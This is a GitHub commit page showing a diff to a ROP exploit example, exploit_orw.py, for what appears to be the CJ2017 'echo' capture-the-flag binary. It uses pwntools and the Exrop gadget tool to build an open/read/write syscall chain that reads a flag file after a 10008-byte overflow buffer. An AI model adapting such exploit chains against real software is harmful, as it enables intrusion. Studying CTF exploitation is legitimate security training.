Skip to content
This repository has been archived by the owner on Nov 13, 2024. It is now read-only.

Commit

Permalink
update examples
Browse files Browse the repository at this point in the history
  • Loading branch information
@d4em0n
d4em0n committed Feb 7, 2020
1 parent 134a4d7 commit b653578
Showing 1 changed file with 6 additions and 9 deletions.
15 changes: 6 additions & 9 deletions examples/CJ2017_echo/exploit_orw.py
View file
Original file line number Diff line number Diff line change
@@ -1,22 +1,19 @@
from pwn import *
import time
from Exrop import Exrop

binname = "echo"
libc = ELF(binname, checksec=False)
bss = libc.bss()
elf = ELF(binname, checksec=False)
rwaddr = elf.bss()

SYS_OPEN = 2
SYS_READ = 0
SYS_WRITE = 1

t = time.mktime(time.gmtime())
rop = Exrop(binname)
rop.find_gadgets(cache=True) # it's slow for first analyze keep waiting
print("Analyzing done in {}s".format(time.mktime(time.gmtime()) - t))
chain = rop.syscall(SYS_OPEN, ('./this_is_flag.txt', 0, 0), bss)
chain += rop.syscall(SYS_READ, ('rax', bss, 0x40))
chain += rop.syscall(SYS_WRITE, (1, bss, 0x40))
rop.find_gadgets(cache=True)
chain = rop.syscall(SYS_OPEN, ('./this_is_flag.txt', 0, 0), rwaddr)
chain += rop.syscall(SYS_READ, ('rax', rwaddr, 0x40))
chain += rop.syscall(SYS_WRITE, (1, rwaddr, 0x40))
chain.dump()
buf = b"A"*10008
pay = buf + chain.payload_str()
Expand Down

0 comments on commit b653578

Please sign in to comment.